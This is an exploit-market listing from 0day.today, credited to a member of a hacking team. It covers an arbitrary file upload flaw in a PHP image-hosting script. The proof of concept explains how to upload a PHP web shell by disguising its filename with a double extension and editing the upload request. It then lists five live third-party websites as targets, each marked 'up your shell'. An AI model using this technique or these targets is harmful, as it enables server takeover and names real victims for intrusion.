[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Simple Image Hosting script Arbitrary File Upload

Author
DoSs-Dz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17968
Category
web applications
Date add
05-04-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               +---------------------------------------+              1
0               |I'm DoSs-Dz member from Inj3ct0r Team  |              1
1               +---------------------------------------+              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+----------------------------------------------------------------------------+
# Exploit Title : Simple Image Hosting script Arbitrary File Upload 
# Date :  04 April 2012
# Site for Vendor : http://garr.dl.sourceforge.net/project/imagehost/imagehost/0.1/simple_image_hosting_script_0.1.zip  
# Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+



[!1»] Exploit P0C =» 

      http://<server>/<path>/up your shell like shell.Dz.php.;jpg
      and use tamper data to change your shell upload : 

      form-data; name="file"; filename="shell.Dz.php.;jpg" => form-data; name="file"; filename="k.php;jpg"

[!2»] Live Site Demo  =» 
 
      http://up.goldenmarket.ir/  < -- up your shell 
      http://www.wildroo.com.au/imghost/ < -- up your shell
      http://www.novarata.net/testing/sihs/  < -- up your shell
      http://aquate.0fees.net/   < -- up your shell
      http://imagehost.netai.net/Slike/  < -- up your shell
+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ]       |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ]  |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+ 
|./ Gharrdaia on : 04 april 2012     |
+------------------------------------+



#  0day.today [2024-12-25]  #